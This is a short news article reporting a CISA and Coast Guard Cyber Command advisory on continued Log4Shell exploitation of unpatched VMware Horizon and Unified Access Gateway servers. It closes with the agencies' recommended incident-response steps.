The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) have released a joint advisory warning VMware Horizon and Unified Access Gateway users that both these products are still actively being exploited via the Log4Shell vulnerability.
The vulnerability was first discovered in November 2021 and saw widespread exploitation by independent and state-sponsored threat actors by December. While VMware has patched the vulnerability since unpatched servers continue to give attackers initial access to organisations that haven’t deployed security measures yet.
VMware’s fixes were available starting December 2021 and exploitation in the wild was confirmed on December 10. According to the report, since December 2021 multiple unpatched, public-facing VMware Horizon and UAG servers have been exploited to obtain initial access by different threat actor groups.
Log4j is maintained by Apache Software Foundation. The open-source library is used by a lot of different software vendors including VMware, Cisco, IBM and Oracle. The vulnerability itself, tracked as CVE-2021-44228, is rather difficult to patch fully given the large-scale application by end-user organisations, device manufacturers and services impacted.
While initial exploits were just used to deploy crypto-mining malware or cryptojackers, investigations carried out by the CISA and CGCYBER on victim networks reveal that threat actors are using the vulnerability for far worse. In one confirmed attack, the attackers were able to move laterally inside the network gaining access to a disaster recovery network and collecting and extracting sensitive data.
The advisory also contains an analysis of the investigations carried out on two victim networks as well as incident response and mitigation steps. In case a compromise is detected, CISA and CGCYBER recommended the following actions
- Immediately quarantine impacted systems.
- Collecting and reviewing relevant logs, data and other related files/artefacts.
- Getting support from a third-party incident response organisation.
- Reporting the incident to CISA.